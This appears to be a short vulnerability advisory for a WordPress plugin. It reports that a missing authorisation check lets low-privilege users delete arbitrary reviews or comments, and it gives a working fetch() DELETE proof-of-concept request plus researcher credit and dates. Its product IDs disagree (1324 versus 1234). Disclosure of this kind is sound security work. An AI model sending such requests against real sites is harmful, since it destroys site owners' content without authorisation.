The plugin does not have proper authorisation check when deleting reviews, which could allow any authenticated users, such as subscriber to delete arbitrary comment
Log in as any user (with privileges as low as Subscriber). fetch("https://127.0.0.1:8001/?rest_route=/wc/v2/products/1324/reviews/2&force=1", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "method": "DELETE", "credentials": "include" }); That needs product 1234 to not exist. It will permanently remove comment with ID 2.
Krzysztof Zając
Krzysztof Zając
Yes
2022-02-23 (about 11 months ago)
2022-02-23 (about 11 months ago)
2022-04-16 (about 9 months ago)